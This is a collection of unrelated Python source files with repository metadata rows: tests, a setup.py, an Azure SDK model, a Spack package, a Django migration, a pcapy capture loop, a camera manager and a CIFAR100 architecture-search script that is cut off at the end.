objs = self.get_deleted_objects(service_manager, IRule)
assert 1 == len(objs)
assert 'https_redirector' == objs[0].name
| true
| true
|
1c40b187ffe264ce102883fdd6f745650f5432a9
| 549
|
py
|
Python
|
tests/functional_tests/to_constant_tests/test_definition.py
|
lycantropos/lz
|
632baaffc1c62cd644f6e67f0bcd7971ae6580da
|
[
"MIT"
] | 7
|
2019-05-26T15:30:03.000Z
|
2022-03-07T16:00:31.000Z
|
tests/functional_tests/to_constant_tests/test_definition.py
|
lycantropos/lz
|
632baaffc1c62cd644f6e67f0bcd7971ae6580da
|
[
"MIT"
] | 29
|
2018-11-12T11:45:56.000Z
|
2021-05-04T17:24:45.000Z
|
tests/functional_tests/to_constant_tests/test_definition.py
|
lycantropos/lz
|
632baaffc1c62cd644f6e67f0bcd7971ae6580da
|
[
"MIT"
] | null | null | null |
from typing import (Any,
Dict,
Tuple)
from hypothesis import given
from lz.functional import to_constant
from tests import strategies
@given(strategies.scalars,
strategies.positionals_arguments,
strategies.keywords_arguments)
def test_basic(object_: Any,
positional_arguments: Tuple,
keyword_arguments: Dict[str, Any]) -> None:
constant = to_constant(object_)
result = constant(*positional_arguments, **keyword_arguments)
assert result is object_
| 24.954545
| 65
| 0.672131
|
from typing import (Any,
Dict,
Tuple)
from hypothesis import given
from lz.functional import to_constant
from tests import strategies
@given(strategies.scalars,
strategies.positionals_arguments,
strategies.keywords_arguments)
def test_basic(object_: Any,
positional_arguments: Tuple,
keyword_arguments: Dict[str, Any]) -> None:
constant = to_constant(object_)
result = constant(*positional_arguments, **keyword_arguments)
assert result is object_
| true
| true
|
1c40b19329458681621f933a54d265735457c0f6
| 863
|
py
|
Python
|
metecho/api/management/commands/tests/truncate_data.py
|
VaccineCloud/Metecho-Vax
|
48762a2b5bb53d0d5633d1871e4f1451f5e3e91c
|
[
"BSD-3-Clause"
] | 1
|
2021-12-09T20:39:01.000Z
|
2021-12-09T20:39:01.000Z
|
metecho/api/management/commands/tests/truncate_data.py
|
VaccineCloud/Metecho-Vax
|
48762a2b5bb53d0d5633d1871e4f1451f5e3e91c
|
[
"BSD-3-Clause"
] | 1,613
|
2020-03-26T16:39:57.000Z
|
2022-03-07T14:54:16.000Z
|
metecho/api/management/commands/tests/truncate_data.py
|
VaccineCloud/Metecho-Vax
|
48762a2b5bb53d0d5633d1871e4f1451f5e3e91c
|
[
"BSD-3-Clause"
] | 2
|
2021-04-09T18:51:10.000Z
|
2022-01-04T20:32:48.000Z
|
import pytest
from django.core.management import call_command
from ....models import Epic, Project, ProjectSlug, Task
@pytest.mark.django_db
def test_truncate_data(project_factory, epic_factory, task_factory):
project_factory(repo_owner="test", repo_name="repo")
project_factory(repo_owner="test", repo_name="repo2")
project = project_factory(repo_owner="test", repo_name="repo3")
epic = epic_factory(project=project)
task_factory(epic=epic)
task_factory(epic=None, project=project)
assert ProjectSlug.objects.count() == 3
assert Project.objects.count() == 3
assert Epic.objects.count() == 1
assert Task.objects.count() == 2
call_command("truncate_data")
assert not ProjectSlug.objects.exists()
assert not Project.objects.exists()
assert not Epic.objects.exists()
assert not Task.objects.exists()
| 31.962963
| 68
| 0.735805
|
import pytest
from django.core.management import call_command
from ....models import Epic, Project, ProjectSlug, Task
@pytest.mark.django_db
def test_truncate_data(project_factory, epic_factory, task_factory):
project_factory(repo_owner="test", repo_name="repo")
project_factory(repo_owner="test", repo_name="repo2")
project = project_factory(repo_owner="test", repo_name="repo3")
epic = epic_factory(project=project)
task_factory(epic=epic)
task_factory(epic=None, project=project)
assert ProjectSlug.objects.count() == 3
assert Project.objects.count() == 3
assert Epic.objects.count() == 1
assert Task.objects.count() == 2
call_command("truncate_data")
assert not ProjectSlug.objects.exists()
assert not Project.objects.exists()
assert not Epic.objects.exists()
assert not Task.objects.exists()
| true
| true
|
1c40b1a24e52abaf9b0af9bee3f8f61e57faf9fb
| 965
|
py
|
Python
|
setup.py
|
kaniak274/pytest_django_dotenv
|
fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8
|
[
"MIT"
] | 1
|
2021-02-16T09:21:20.000Z
|
2021-02-16T09:21:20.000Z
|
setup.py
|
kaniak274/pytest_django_dotenv
|
fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8
|
[
"MIT"
] | null | null | null |
setup.py
|
kaniak274/pytest_django_dotenv
|
fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8
|
[
"MIT"
] | null | null | null |
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytest-django-dotenv',
version='0.1.2',
author='Kamil Kucharski',
author_email='kaniak274@gmail.com',
description='Pytest plugin used to setup environment variables with django-dotenv',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['pytest_django_dotenv'],
entry_points={'pytest11': ['env = pytest_django_dotenv.plugin']},
install_requires=['pytest>=2.6.0', 'django-dotenv>=1.4.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
url='https://github.com/kaniak274/pytest-django-dotenv'
)
| 33.275862
| 87
| 0.687047
|
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytest-django-dotenv',
version='0.1.2',
author='Kamil Kucharski',
author_email='kaniak274@gmail.com',
description='Pytest plugin used to setup environment variables with django-dotenv',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['pytest_django_dotenv'],
entry_points={'pytest11': ['env = pytest_django_dotenv.plugin']},
install_requires=['pytest>=2.6.0', 'django-dotenv>=1.4.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
url='https://github.com/kaniak274/pytest-django-dotenv'
)
| true
| true
|
1c40b28275563c9bcc37a95e98c3c5e5403a8490
| 3,226
|
py
|
Python
|
src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class HubVirtualNetworkConnection(Resource):
"""HubVirtualNetworkConnection Resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param remote_virtual_network: Reference to the remote virtual network.
:type remote_virtual_network:
~azure.mgmt.network.v2018_04_01.models.SubResource
:param allow_hub_to_remote_vnet_transit: VirtualHub to RemoteVnet transit
to enabled or not.
:type allow_hub_to_remote_vnet_transit: bool
:param allow_remote_vnet_to_use_hub_vnet_gateways: Allow RemoteVnet to use
Virtual Hub's gateways.
:type allow_remote_vnet_to_use_hub_vnet_gateways: bool
:param provisioning_state: The provisioning state of the resource.
Possible values include: 'Succeeded', 'Updating', 'Deleting', 'Failed'
:type provisioning_state: str or
~azure.mgmt.network.v2018_04_01.models.ProvisioningState
:ivar etag: Gets a unique read-only string that changes whenever the
resource is updated.
:vartype etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'allow_hub_to_remote_vnet_transit': {'key': 'properties.allowHubToRemoteVnetTransit', 'type': 'bool'},
'allow_remote_vnet_to_use_hub_vnet_gateways': {'key': 'properties.allowRemoteVnetToUseHubVnetGateways', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(HubVirtualNetworkConnection, self).__init__(**kwargs)
self.remote_virtual_network = kwargs.get('remote_virtual_network', None)
self.allow_hub_to_remote_vnet_transit = kwargs.get('allow_hub_to_remote_vnet_transit', None)
self.allow_remote_vnet_to_use_hub_vnet_gateways = kwargs.get('allow_remote_vnet_to_use_hub_vnet_gateways', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.etag = None
| 43.013333
| 128
| 0.657161
|
from .resource import Resource
class HubVirtualNetworkConnection(Resource):
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'allow_hub_to_remote_vnet_transit': {'key': 'properties.allowHubToRemoteVnetTransit', 'type': 'bool'},
'allow_remote_vnet_to_use_hub_vnet_gateways': {'key': 'properties.allowRemoteVnetToUseHubVnetGateways', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(HubVirtualNetworkConnection, self).__init__(**kwargs)
self.remote_virtual_network = kwargs.get('remote_virtual_network', None)
self.allow_hub_to_remote_vnet_transit = kwargs.get('allow_hub_to_remote_vnet_transit', None)
self.allow_remote_vnet_to_use_hub_vnet_gateways = kwargs.get('allow_remote_vnet_to_use_hub_vnet_gateways', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.etag = None
| true
| true
|
1c40b2b1cacdd7a0bd6c256ff4ba3c37fa555251
| 618
|
py
|
Python
|
var/spack/repos/builtin/packages/py-portalocker/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11
|
2015-10-04T02:17:46.000Z
|
2018-02-07T18:23:00.000Z
|
var/spack/repos/builtin/packages/py-portalocker/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22
|
2017-08-01T22:45:10.000Z
|
2022-03-10T07:46:31.000Z
|
var/spack/repos/builtin/packages/py-portalocker/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4
|
2016-06-10T17:57:39.000Z
|
2018-09-11T04:59:38.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPortalocker(PythonPackage):
"""Portalocker is a library to provide an easy API to file
locking."""
homepage = "https://github.com/WoLpH/portalocker"
url = "https://github.com/WoLpH/portalocker/archive/v1.6.0.tar.gz"
version('1.6.0', sha256='084ff315ccb9fb38a7c06155d409da5df29647da7c6d2bc2b24637f9f79001ff')
depends_on('py-setuptools@38.3.0:', type='build')
| 32.526316
| 95
| 0.734628
|
from spack import *
class PyPortalocker(PythonPackage):
homepage = "https://github.com/WoLpH/portalocker"
url = "https://github.com/WoLpH/portalocker/archive/v1.6.0.tar.gz"
version('1.6.0', sha256='084ff315ccb9fb38a7c06155d409da5df29647da7c6d2bc2b24637f9f79001ff')
depends_on('py-setuptools@38.3.0:', type='build')
| true
| true
|
1c40b4cc87f97cf71ca30d992fb54a0db8b1047d
| 1,095
|
py
|
Python
|
wildlifecompliance/migrations/0561_wildcarespeciestype.py
|
mintcoding/wildlifecompliance
|
28f5bb4ce3116fb62d836a39612c72a052e54ae1
|
[
"Apache-2.0"
] | null | null | null |
wildlifecompliance/migrations/0561_wildcarespeciestype.py
|
mintcoding/wildlifecompliance
|
28f5bb4ce3116fb62d836a39612c72a052e54ae1
|
[
"Apache-2.0"
] | 3
|
2020-03-12T00:45:31.000Z
|
2022-03-02T10:37:23.000Z
|
wildlifecompliance/migrations/0561_wildcarespeciestype.py
|
mintcoding/wildlifecompliance
|
28f5bb4ce3116fb62d836a39612c72a052e54ae1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-11-25 02:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0560_callemail_baby_kangaroo'),
]
operations = [
migrations.CreateModel(
name='WildcareSpeciesType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('cane_toad', 'Cane Toad'), ('frog', 'Frog'), ('coot', 'Coot'), ('goose', 'Goose'), ('snake', 'Snake')], max_length=100, unique=True)),
('call_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wildlifecompliance.CallType')),
],
options={
'verbose_name': 'CM_WilcareSpeciesType',
'verbose_name_plural': 'CM_WilcareSpeciesTypes',
'ordering': ['name'],
},
),
]
| 36.5
| 186
| 0.6
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0560_callemail_baby_kangaroo'),
]
operations = [
migrations.CreateModel(
name='WildcareSpeciesType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('cane_toad', 'Cane Toad'), ('frog', 'Frog'), ('coot', 'Coot'), ('goose', 'Goose'), ('snake', 'Snake')], max_length=100, unique=True)),
('call_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wildlifecompliance.CallType')),
],
options={
'verbose_name': 'CM_WilcareSpeciesType',
'verbose_name_plural': 'CM_WilcareSpeciesTypes',
'ordering': ['name'],
},
),
]
| true
| true
|
1c40b56d028600725c2cf60e6f97d08757f6e869
| 265
|
py
|
Python
|
networking/packet_capture.py
|
ddubson/code-dojo-py
|
31a1f6289672c45dc45a49a45ccc1a4326410b4b
|
[
"MIT"
] | 1
|
2017-03-27T00:21:01.000Z
|
2017-03-27T00:21:01.000Z
|
networking/packet_capture.py
|
ddubson/code-dojo-py
|
31a1f6289672c45dc45a49a45ccc1a4326410b4b
|
[
"MIT"
] | null | null | null |
networking/packet_capture.py
|
ddubson/code-dojo-py
|
31a1f6289672c45dc45a49a45ccc1a4326410b4b
|
[
"MIT"
] | null | null | null |
import pcapy
devs = pcapy.findalldevs()
print(devs)
try:
cap = pcapy.open_live("en0", 65536, 1, 0)
count = 1
while count:
(header, payload) = cap.next()
print(count)
count += 1
except KeyboardInterrupt:
print("Exiting.")
| 15.588235
| 45
| 0.592453
|
import pcapy
devs = pcapy.findalldevs()
print(devs)
try:
cap = pcapy.open_live("en0", 65536, 1, 0)
count = 1
while count:
(header, payload) = cap.next()
print(count)
count += 1
except KeyboardInterrupt:
print("Exiting.")
| true
| true
|
1c40b647a9ebb9057beb8c754620f9cd633a69da
| 2,418
|
py
|
Python
|
uflow/data/dataset_size_test.py
|
egonrian/google-research
|
8177adbe9ca0d7e5a9463b54581fe6dd27be0974
|
[
"Apache-2.0"
] | 3
|
2021-01-18T04:46:49.000Z
|
2021-03-05T09:21:40.000Z
|
uflow/data/dataset_size_test.py
|
Alfaxad/google-research
|
2c0043ecd507e75e2df9973a3015daf9253e1467
|
[
"Apache-2.0"
] | 25
|
2020-07-25T08:53:09.000Z
|
2022-03-12T00:43:02.000Z
|
uflow/data/dataset_size_test.py
|
Alfaxad/google-research
|
2c0043ecd507e75e2df9973a3015daf9253e1467
|
[
"Apache-2.0"
] | 4
|
2021-02-08T10:25:45.000Z
|
2021-04-17T14:46:26.000Z
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that all datasets have expected length."""
from absl.testing import absltest
from uflow.data import generic_flow_dataset
from uflow.data import kitti
from uflow.data import sintel
from uflow.data.dataset_locations import dataset_locations
DATASETS_AND_SIZE = {
# Note that sintel train has 1064 images, but only 1041 ground truth flows.
# Sintel train provides 23 video snippets, and for each video snippet there
# is one fewer flow than there are images (e.g., for a video of 2 frames,
# you would only have 1 flow image).
'sintel-test-clean': 552,
'sintel-test-final': 552,
'sintel-train-clean': 1041,
'sintel-train-final': 1041,
'kitti15-train-pairs': 200,
'kitti15-test-pairs': 200,
'chairs-all': 22872,
}
class DatasetSizeTest(absltest.TestCase):
def _check_size(self, dataset, expected_size):
count = 0
for _ in dataset:
count += 1
self.assertEqual(count, expected_size)
def test_sintel(self):
for dataset in ['sintel-test-clean', 'sintel-test-final',
'sintel-train-clean', 'sintel-train-final']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = sintel.make_dataset(path, mode='test')
self._check_size(ds, size)
def test_kitti(self):
for dataset in ['kitti15-train-pairs', 'kitti15-test-pairs']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = kitti.make_dataset(path, mode='eval')
self._check_size(ds, size)
def test_chairs(self):
for dataset in ['chairs-all']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = generic_flow_dataset.make_dataset(path, mode='test')
self._check_size(ds, size)
if __name__ == '__main__':
absltest.main()
| 33.123288
| 79
| 0.707196
|
from absl.testing import absltest
from uflow.data import generic_flow_dataset
from uflow.data import kitti
from uflow.data import sintel
from uflow.data.dataset_locations import dataset_locations
DATASETS_AND_SIZE = {
'sintel-test-clean': 552,
'sintel-test-final': 552,
'sintel-train-clean': 1041,
'sintel-train-final': 1041,
'kitti15-train-pairs': 200,
'kitti15-test-pairs': 200,
'chairs-all': 22872,
}
class DatasetSizeTest(absltest.TestCase):
def _check_size(self, dataset, expected_size):
count = 0
for _ in dataset:
count += 1
self.assertEqual(count, expected_size)
def test_sintel(self):
for dataset in ['sintel-test-clean', 'sintel-test-final',
'sintel-train-clean', 'sintel-train-final']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = sintel.make_dataset(path, mode='test')
self._check_size(ds, size)
def test_kitti(self):
for dataset in ['kitti15-train-pairs', 'kitti15-test-pairs']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = kitti.make_dataset(path, mode='eval')
self._check_size(ds, size)
def test_chairs(self):
for dataset in ['chairs-all']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = generic_flow_dataset.make_dataset(path, mode='test')
self._check_size(ds, size)
if __name__ == '__main__':
absltest.main()
| true
| true
|
1c40b8c8b43cf840740df919cace841d79a604e2
| 2,398
|
py
|
Python
|
Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py
|
tonybeltramelli/Graphics-And-Vision
|
a1dbeada8e907b119ecce1fe421ae91e64ff3371
|
[
"Apache-2.0"
] | 12
|
2017-05-26T12:04:38.000Z
|
2021-07-11T04:42:19.000Z
|
Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py
|
tonybeltramelli/Graphics-And-Vision
|
a1dbeada8e907b119ecce1fe421ae91e64ff3371
|
[
"Apache-2.0"
] | null | null | null |
Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py
|
tonybeltramelli/Graphics-And-Vision
|
a1dbeada8e907b119ecce1fe421ae91e64ff3371
|
[
"Apache-2.0"
] | 4
|
2017-05-09T08:26:44.000Z
|
2018-04-23T03:16:01.000Z
|
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- File : StereoCameras.py -->
#<!-- Description: Class used for managing the stereo cameras -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: These classes are based on Lazy Initialization examples -->
#<!-- illustrated in Wikipedia -->
#<!-- Date : 05/04/2015 -->
#<!-- Change : 05/04/2015 - Creation of these classes -->
#<!-- Review : 05/04/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = '$Revision: 2015040501 $'
########################################################################
from Cameras import Cameras
from Setting.ClassProperty import ClassProperty
########################################################################
class StereoCameras(object):
"""CameraManager Class is used for managing some cameras instances."""
#----------------------------------------------------------------------#
# Class Attributes #
#----------------------------------------------------------------------#
__Instance = None
#----------------------------------------------------------------------#
# Static Class Methods #
#----------------------------------------------------------------------#
@ClassProperty
def Instance(self):
"""Create an instance for managing the stereo cameras."""
if self.__Instance is None:
self.__Instance = Cameras(0, 2)
return self.__Instance
| 55.767442
| 80
| 0.330275
|
__version__ = '$Revision: 2015040501 $'
| true
| true
|
1c40b91e04029a84ae33cbabeb5831f5f3e1d38e
| 9,216
|
py
|
Python
|
scripts/ased_search_inversion1_cifar100.py
|
anton-muravev/ased
|
16ddb70ac3e46556cf49569915df0165a6fb7d16
|
[
"Apache-2.0"
] | null | null | null |
scripts/ased_search_inversion1_cifar100.py
|
anton-muravev/ased
|
16ddb70ac3e46556cf49569915df0165a6fb7d16
|
[
"Apache-2.0"
] | null | null | null |
scripts/ased_search_inversion1_cifar100.py
|
anton-muravev/ased
|
16ddb70ac3e46556cf49569915df0165a6fb7d16
|
[
"Apache-2.0"
] | 1
|
2021-12-06T08:42:59.000Z
|
2021-12-06T08:42:59.000Z
|
# -*- coding: utf-8 -*-
## INVERSION1 EXPERIMENT ON CIFAR100
import utorch
import ased
import ased_util
import sys
import time
import numpy as np
from astore import Astore
from sklearn.model_selection import StratifiedShuffleSplit
import argparse
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
parser = argparse.ArgumentParser(description="Run the ASED search with the given settings")
parse_group = parser.add_mutually_exclusive_group()
parser.add_argument('--cifarpath', required=True, help="path to CIFAR100 dataset")
parser.add_argument('--init', required=True, help="path to init file, including filename")
parser.add_argument('--out', required=True, help="prefix for output files")
parse_group.add_argument('--dense', type=int,
help="enable dense shortcut pattern with given value")
parse_group.add_argument('--residual', type=int,
help="enable residual shortcut pattern with given value")
parser.add_argument('--iter', type=int, default=9,
help="number of search iterations to run")
parser.add_argument('--bound', type=float, default=0.9,
help="the upper bound for probability")
parser.add_argument('--invth', type=int, default=0.65,
help="inversion threshold of prototype norm")
parser.add_argument('--protolimit', type=int, default=10,
help="limit on the inversion count before terminating")
parser.add_argument('--gpus', type=int, default=4,
help="number of GPU devices to use")
parser.add_argument('--netcount', type=int, default=250,
help="networks to sample per GPU")
parser.add_argument('--workers', type=int, default=8,
help="number of data loading CPU workers per GPU")
parser.add_argument('--resume', type=int, default=-1,
help="from which iteration to continue, omit to start from scratch")
args = parser.parse_args()
cifarpath = args.cifarpath
init_path = args.init
out_prefix = args.out
gpu_count = args.gpus
netcount = args.netcount
big_iterations = args.iter
shortcut = 'none'
shortcut_value = 2
if args.dense:
shortcut = 'dense'
shortcut_value = args.dense
if args.residual:
shortcut = 'residual'
shortcut_value = args.residual
prob_bound = args.bound
invert_threshold = args.invth
protolimit = args.protolimit
inv_counter = 0
base_lr = 0.01
momentum = 0.9
workers = args.workers
epochs = 20
batch_size = 128
class_count = 100
top_slice = 100
cudnn.benchmark = False
resume = args.resume
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.447],
std=[0.247, 0.243, 0.262])
train_dataset = datasets.CIFAR100(cifarpath, train=True,
transform=transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize]))
test_dataset = datasets.CIFAR100(cifarpath, train=False,
transform=transforms.Compose([
transforms.ToTensor(),
normalize]))
def adjust_learning_rate(optimizer, epoch, lr):
lr = lr * (0.1 ** (epoch // 10))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def get_layer_schedule(iteration):
if iteration<2:
return 2
else:
return 1
opLibrary = ased.get_default_library()
def gpu_proc(gpu_id, it, prototype, netcount, train_idx, val_idx, seed):
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
fname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(gpu_id)+".pickle"
store = Astore()
for p in pars:
store[p] = []
np.random.seed(seed+gpu_id)
torch.manual_seed(seed+gpu_id)
torch.cuda.set_device(gpu_id)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(train_idx),
num_workers=workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(val_idx),
num_workers=workers, pin_memory=True)
for n in range(netcount):
if n % 50 == 0:
print("GPU "+str(gpu_id)+" processed "+str(n)+" networks")
net = ased.generate_shortcut_feature_network(3, 32, 32, prototype,
opLibrary,
shortcuts=shortcut,
skip_value=shortcut_value)
store['phenotypes'].append(ased.network_to_phenotype(net))
evnet = ased.EvalNet2(net, class_count).cuda()
crit = nn.CrossEntropyLoss().cuda()
lr = base_lr
optim = torch.optim.SGD(evnet.parameters(), lr,
momentum=momentum)
start = time.time()
for epoch in range(0, epochs):
lr = adjust_learning_rate(optim, epoch, lr)
utorch.train1epoch(train_loader, evnet, crit, optim, epoch,
verbose=False)
store['runtime'].append(time.time()-start)
acc, loss, cfmat = utorch.validate_cfmat(val_loader, evnet, crit,
class_count, verbose=False)
store['loss'].append(loss)
store['cfmat'].append(cfmat)
store['matthews'].append(ased_util.multiclass_matthews(cfmat))
store['perf'].append(acc)
store['params'].append(utorch.count_parameters(evnet))
store.dump(fname)
del evnet
del crit
del optim
store.dump(fname)
print("GPU "+str(gpu_id)+" finished generation "+str(it))
if __name__ == '__main__':
base_seed = 3051991
np.random.seed(base_seed)
torch.manual_seed(base_seed)
pars = ['perf', 'runtime', 'cfmat', 'matthews', 'loss', 'params',
'phenotypes']
mainstore = Astore()
splitter = StratifiedShuffleSplit(n_splits=big_iterations, test_size=0.2)
tr = splitter.split(np.zeros((50000,1)), train_dataset.targets)
if resume == -1:
init_store = Astore()
init_store.load(init_path)
topnets = np.argsort(init_store['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(init_store['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
del init_store
else:
print("Resuming the process from iteration "+str(resume))
sname = "./data/"+out_prefix+"_iter"+str(resume)+"_cumul.pickle"
mainstore.load(sname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
prototype = np.stack(topbinaries, axis=-1).mean(axis=-1)
for it in np.arange(resume+1,big_iterations):
print("Starting evo generation "+str(it))
fname = "./data/"+out_prefix+"_iter"+str(it)+"_cumul.pickle"
for p in pars:
mainstore[p] = []
if np.linalg.norm(prototype,axis=1).mean() > invert_threshold:
print("Inversion threshold reached, prototype modified")
if inv_counter == protolimit:
print("Prototype limit reached, stopping the search")
sys.exit(0)
inv_counter+=1
prototype = ased.invert_prototype(prototype, len(opLibrary),
prob_bound)
add_layer = get_layer_schedule(it)
prototype = np.vstack([prototype,
ased.get_uniform_prototype(add_layer, opLibrary)])
train_idx, val_idx = next(tr)
processes = []
for r in range(gpu_count):
p = mp.Process(target=gpu_proc, args=(r,it, prototype, netcount,
train_idx, val_idx, base_seed))
p.start()
processes.append(p)
for p in processes:
p.join()
smallstore = Astore()
for r in range(gpu_count):
sname = "./data/"+out_prefix+"_iter"+str(it)+"_gpu"+str(r)+".pickle"
smallstore.load(sname)
for v in pars:
mainstore[v].extend(smallstore[v])
mainstore.dump(fname)
topnets = np.argsort(mainstore['matthews'])[-top_slice:][::-1]
topbinaries = [ased.phenotype_to_binary(mainstore['phenotypes'][i])
for i in topnets]
